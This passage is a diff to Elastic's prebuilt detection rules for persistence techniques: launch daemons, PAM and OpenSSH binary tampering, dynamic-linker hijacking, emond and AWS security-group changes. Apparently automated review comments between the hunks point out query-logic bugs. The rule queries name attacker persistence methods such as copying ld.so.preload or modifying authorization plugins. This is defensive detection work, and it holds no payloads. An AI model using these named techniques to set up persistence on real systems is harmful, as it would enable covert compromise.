Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} 
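Review bot: The boolean grouping in the new rule's query lets the second alternative match without the `event.type == "start"` gate — EQL `and` binds tighter than `or`, so `event.type == "start"` only applies to the `/usr/sbin/chkconfig` branch, and `process.args : "*chkconfig" and process.args : "--add"` fires on any process event type. Factoring the shared `--add` check out restores the intended gate: `process where event.type == "start" and process.args : "--add" and (process.executable : "/usr/sbin/chkconfig" or process.args : "*chkconfig")`. Separately, `"risk_score": 74` is paired with `"severity": "medium"`, while the other rules in this diff pair 73 with `high` and 47 with `medium`, so one of the two values looks off. Unlike the other `timestamp_override: event.ingested` rules here, this one also ships without the `setup` text about populating `event.ingested` on pre-8.2 non-agent indices.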
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json index b94bbc9cf5117..49eab1a2e8c5e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_change_launch_agents_file.json @@ -18,6 +18,33 @@ "references": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "082e3f8c-6f80-485c-91eb-5b112cb79b28", "severity": "low", @@ -53,5 +80,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json index d069fb44ec27c..310538c93a7c9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_hidden_login_item_osascript.json 
@@ -11,10 +11,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation of Hidden Login Item via Apple Script", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*login item*hidden:true*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json index c01a562426ea6..6b3f1bbe4005b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_creation_modif_launch_deamon_sequence.json @@ -14,10 +14,37 @@ "language": "eql", "license": "Elastic License v2", "name": "LaunchDaemon Creation or Modification and Immediate Loading", - "query": "sequence by host.id with maxspan=1m\n [file where event.type != \"deletion\" and file.path in (\"/System/Library/LaunchDaemons/*\", \"/Library/LaunchDaemons/*\")]\n [process where event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", + "query": "sequence by host.id with maxspan=1m\n [file where event.type != \"deletion\" and file.path : (\"/System/Library/LaunchDaemons/*\", \"/Library/LaunchDaemons/*\")]\n [process where event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", "references": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d19ece6-c20e-481a-90c5-ccca596537de", "severity": "low", @@ -46,5 +73,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json index d66066bca644e..db16ffe049247 100644 
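Review bot: The `in` → `:` change in the first sequence step is a behaviour change rather than metadata: EQL `in` compares exact strings, so the previous `file.path in ("/System/Library/LaunchDaemons/*", ...)` would only have matched a path that literally ended in `*`, and the sequence could not fire on real LaunchDaemon writes. That deserves a sentence in the rule's changelog or the commit description rather than being buried among the `required_fields` additions. The second step still keys on `process.args == "load"` only; `launchctl bootstrap` is the documented replacement for `load` on current macOS, so `process.args in ("load", "bootstrap")` would keep coverage as tooling moves on — hedged, since the diff does not show which launchctl forms the telemetry reports.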
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json @@ -11,11 +11,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Authorization Plugin Modification", - "query": "event.category:file and not event.type:deletion and\n file.path:(/Library/Security/SecurityAgentPlugins/* and\n not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/Contents/*)\n", + "query": "event.category:file and not event.type:deletion and\n file.path:(/Library/Security/SecurityAgentPlugins/* and\n not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/*) and\n not process.name:shove and process.code_signature.trusted:true\n", "references": [ "https://developer.apple.com/documentation/security/authorization_plug-ins", "https://www.xorrior.com/persistent-credential-theft/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e6c98d38-633d-4b3e-9387-42112cd5ac10", "severity": "medium", @@ -52,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
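Review bot: The appended clause `not process.name:shove and process.code_signature.trusted:true` parses as `(not process.name:shove) and process.code_signature.trusted:true`, because KQL gives `not` higher precedence than `and`; the rule now matches only when the writing process has a trusted signature and silently drops writes from unsigned or untrusted processes — the population most worth alerting on — as well as any event that lacks the `process.code_signature.trusted` field at all. If the intent is to exclude only the signed installer helper `shove`, the exclusion needs its own group: `not (process.name:shove and process.code_signature.trusted:true)`. The widened TeamViewer exclusion (`TeamViewerAuthPlugin.bundle/*`) looks intentional and is unaffected.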
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json index 31e52590e22e0..1a1c673467041 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json @@ -21,6 +21,33 @@ "http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html", "https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "93f47b6f-5728-4004-ba00-625083b3dcb0", "severity": "medium", @@ -67,5 +94,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json index 46414c400ab8d..2efb3c33c0c78 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json @@ -14,10 +14,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Modification of OpenSSH Binaries", - "query": "event.category:file and event.type:change and \n process.name:* and\n (file.path:(/usr/sbin/sshd or /usr/bin/ssh or /usr/bin/sftp or /usr/bin/scp) or file.name:libkeyutils.so) and\n not process.executable:/usr/bin/dpkg\n", + "query": "event.category:file and event.type:change and\n process.name:* and\n (file.path:(/usr/sbin/sshd or /usr/bin/ssh or /usr/bin/sftp or /usr/bin/scp) or file.name:libkeyutils.so) and\n not process.name:(\"dpkg\" or \"yum\" or \"dnf\" or \"dnf-automatic\")\n", "references": [ "https://blog.angelalonso.es/2016/09/anatomy-of-real-linux-intrusion-part-ii.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0415f22a-2336-45fa-ba07-618a5942e22c", "severity": "medium", @@ -63,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json index 3527b14b2de65..c79a3debe7a46 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json 
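Review bot: The package-manager exclusion now keys on `process.name` rather than `process.executable`, which is a looser allow-list: a process name is chosen by whoever launches the process, whereas the old `/usr/bin/dpkg` path check tied the exclusion to a specific binary on disk. The switch is presumably needed for `yum`/`dnf`, which are Python scripts and so report the interpreter in `process.executable`, but `dpkg` is a native binary and can keep the stronger form: `not (process.executable:/usr/bin/dpkg or process.name:("yum" or "dnf" or "dnf-automatic"))`, with `process.executable` restored to `required_fields`. Note also that `rpm` invoked directly is not excluded, so manual package installs on RPM hosts will still alert — probably acceptable, but worth a sentence in `note` or `setup`.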
@@ -15,6 +15,28 @@ "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf", "https://theevilbit.github.io/beyond/beyond_0004/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "530178da-92ea-43ce-94c2-8877a826783d", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json index 7ff8f12e60011..8aadc2ffc8072 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json 
@@ -17,6 +17,28 @@ "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "083fa162-e790-4d85-9aeb-4fea04188adb", "severity": "medium", @@ -76,5 +98,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json index 0fce2b7647df4..82850ede5a0c0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json 
@@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies the creation or modification of a DirectoryService PlugIns (dsplug) file. The DirectoryService daemonlaunches on each system boot and automatically reloads after crash. It scans and executes bundles that are located in the DirectoryServices PlugIns folder and can be abused by adversaries to maintain persistence.", + "description": "Identifies the creation or modification of a DirectoryService PlugIns (dsplug) file. The DirectoryService daemon launches on each system boot and automatically reloads after crash. It scans and executes bundles that are located in the DirectoryServices PlugIns folder and can be abused by adversaries to maintain persistence.", "from": "now-9m", "index": [ "auditbeat-*", @@ -15,6 +15,23 @@ "references": [ "https://blog.chichou.me/2019/11/21/two-macos-persistence-tricks-abusing-plugins/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "89fa6cb7-6b53-4de2-b604-648488841ab8", "severity": "medium", @@ -44,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json index e513b5ace737f..350fcb648ea16 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json 
@@ -15,6 +15,28 @@ "references": [ "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c81cefcb-82b9-4408-a533-3c3df549e62d", "severity": "medium", @@ -44,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json index da4f102eae2c3..2502b88363343 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json @@ -20,6 +20,28 @@ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dont_expire", "https://blog.menasec.net/2019/02/threat-hunting-26-persistent-password.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "62a70f6f-3c37-43df-a556-f64fa475fba2", "severity": "medium", @@ -50,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dynamic_linker_backup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dynamic_linker_backup.json new file mode 100644 index 0000000000000..51f6b85ee67a7 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dynamic_linker_backup.json 
@@ -0,0 +1,86 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dynamic Linker Copy", + "query": "sequence by process.entity_id with maxspan=1m\n[process where event.type == \"start\" and process.name : (\"cp\", \"rsync\") and process.args : (\"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\")]\n[file where event.action == \"creation\" and file.extension == \"so\"]\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 85, + "rule_id": "df6f62d9-caab-4b88-affa-044f4395a1e0", + "severity": "high", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Orbit" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { 
+ "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json index 9002924a3df32..eab6904515aa9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Network Access Control List Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(CreateNetworkAcl or CreateNetworkAclEntry) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/create-network-acl.html", 
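Review bot: The sequence's second step, `file.extension == "so"`, only completes when the file written by the matched `cp`/`rsync` process ends in `.so`; a backup that keeps the loader's own name (`ld-linux-x86-64.so.2`, which ECS records with extension `2`) or appends `.bak` never satisfies it, so the rule as written catches a later `.so` drop rather than the loader copy its description promises. The `process.args` list is also pinned to the Debian/Ubuntu x86_64 loader path; if other layouts are in scope, `/lib64/ld-linux-x86-64.so.2` and the aarch64 loader `ld-linux-aarch64.so.1` would need adding. Unlike every other rule in this diff, the new file carries no `"timestamp_override": "event.ingested"`, which combined with `"from": "now-9m"` risks missing late-ingested events; adding `"timestamp_override": "event.ingested",` before `"type"` would align it. If the "should never occur" claim is kept, a `false_positives` entry for backup or imaging tooling that copies `/etc/ld.so.preload` would help triage.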
@@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/create-network-acl-entry.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateNetworkAclEntry.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "39144f38-5284-4f8e-a2ae-e3fd628d90b0", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json index 526438d6bf430..c94941aa68c6b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json 
@@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Security Group Configuration Change Detection", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(AuthorizeSecurityGroupEgress or \nCreateSecurityGroup or ModifyInstanceAttribute or ModifySecurityGroupRules or RevokeSecurityGroupEgress or \nRevokeSecurityGroupIngress) and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(AuthorizeSecurityGroupEgress or\nCreateSecurityGroup or ModifyInstanceAttribute or ModifySecurityGroupRules or RevokeSecurityGroupEgress or\nRevokeSecurityGroupIngress) and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-security-groups.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "29052c19-ff3e-42fd-8363-7be14d7c5469", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -67,5 +97,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } 
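Review bot: The `event.action` list on the reformatted query line omits `AuthorizeSecurityGroupIngress`, the one call that opens inbound access, while it includes the egress authorize and both revoke calls; unless inbound authorizations are covered by a separate rule, adding `AuthorizeSecurityGroupIngress or` to the list closes an obvious gap in a rule named "Security Group Configuration Change Detection". `ModifyInstanceAttribute` also matches every instance attribute change, not only `groupSet`, so that term will produce noise; a `false_positives` entry, or narrowing on the request parameter if the CloudTrail integration exposes it, would help.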
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json index a2ab1c137fb15..418fdea42ed4d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json @@ -11,14 +11,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Emond Rules Creation or Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.path : (\"/private/etc/emond.d/rules/*.plist\", \"/etc/emon.d/rules/*.plist\", \"/private/var/db/emondClients/*\")\n", "references": [ "https://www.xorrior.com/emond-persistence/", "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json index d18a53d5e5965..56527b8e6f204 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json @@ -14,6 +14,23 @@ "references": [ "https://www.xorrior.com/emond-persistence/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "3e3d15c6-1509-479a-b125-21718372157e", "severity": "medium", @@ -50,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json index b81496a79f960..c0e20d4ba8544 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json 
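Review bot: The query line kept as context in the first hunk still matches `"/etc/emon.d/rules/*.plist"`, which looks like a typo for `/etc/emond.d/rules/*.plist` — the neighbouring `/private/etc/emond.d/rules/*.plist` pattern spells the directory correctly, and on macOS `/etc` is a symlink to `/private/etc`, so an agent reporting the unresolved path would go undetected. Suggest correcting the literal to `\"/etc/emond.d/rules/*.plist\"` in the same change, since the version is already being bumped.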
